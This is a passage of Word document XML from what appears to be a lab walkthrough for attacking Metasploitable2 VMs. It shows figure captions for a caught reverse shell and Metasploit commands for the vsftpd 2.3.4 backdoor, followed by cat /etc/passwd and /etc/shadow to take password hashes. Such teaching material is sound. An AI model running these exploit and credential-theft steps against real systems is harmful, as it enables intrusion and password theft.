      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/f</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="8" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9000"/>
      </w:tblGrid>
      <w:tr w:rsidR="000D5066" w14:paraId="06F0CA94" w14:textId="77777777" w:rsidTr="00F237B6">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:left w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="438CADB5" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="00F237B6">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5913A09F" wp14:editId="6105DFCE">
                  <wp:extent cx="5588000" cy="3143250"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="114" name="Figure 12 - img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1"/>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5588000" cy="3143250"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5E9850BA" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="145DDBEB" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="260" w:after="60" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Figure 13 — Shell caught — proof of RCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCA92DF" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="20" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Run on: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Kali (nc window)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4971604F" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Shows: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The reverse shell running on the web server (id / hostname).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8894BD" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBEC891" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>hostname</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="8" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9000"/>
      </w:tblGrid>
      <w:tr w:rsidR="000D5066" w14:paraId="6D3369A6" w14:textId="77777777" w:rsidTr="00F237B6">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:left w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0121151B" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="00F237B6">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3967DF31" wp14:editId="60EA3038">
                  <wp:extent cx="5588000" cy="3143250"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="115" name="Figure 13 - img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2"/>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5588000" cy="3143250"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6868F206" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D19CB24" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:spacing w:before="240" w:after="100" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Part 4 — Exploit B: Metasploitable2 Root + Passwords (VM .102)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0192DA55" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="260" w:after="60" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Figure 14 — Get root via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CE8F78" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="20" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Run on: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0462EF53" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Shows: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A root shell obtained through the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.3.4 backdoor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6284046A" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAA385C" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>use exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06412A2B" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>set RHOSTS 192.168.56.102</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFB7A22" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26891AE8" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="74DA04BA" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF45A97" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">If it says “no session”, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">run  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  again — it is timing-sensitive.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="8" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9000"/>
      </w:tblGrid>
      <w:tr w:rsidR="000D5066" w14:paraId="2B47C493" w14:textId="77777777" w:rsidTr="00F237B6">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:left w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3B4438FC" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="00F237B6">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1348B0E2" wp14:editId="66B68E17">
                  <wp:extent cx="4445000" cy="2500312"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="116" name="Figure 14 - img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3"/>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4445000" cy="2500312"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="434AE534" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="00F237B6">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0475E6D8" wp14:editId="3A25A1D2">
                  <wp:extent cx="4445000" cy="2500312"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="117" name="Figure 14 - img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4"/>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4445000" cy="2500312"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7B4CF638" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="528EB2BC" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="260" w:after="60" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Figure 15 — Steal the password hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476BC1D2" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="20" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Run on: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Kali (root shell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF761DF" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Shows: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The contents of /etc/passwd and /etc/shadow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C724D8D" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>cat /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3815F423" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>cat /etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D43BB5B" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Copy each output into passwd.txt and shadow.txt on Kali.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="8" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9000"/>
      </w:tblGrid>
      <w:tr w:rsidR="000D5066" w14:paraId="01C3D01F" w14:textId="77777777" w:rsidTr="00F237B6">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:left w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6A776753" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="00F237B6">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50BDB55A" wp14:editId="18E32327">
                  <wp:extent cx="5588000" cy="3143250"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="118" name="Figure 15 - img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5"/>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
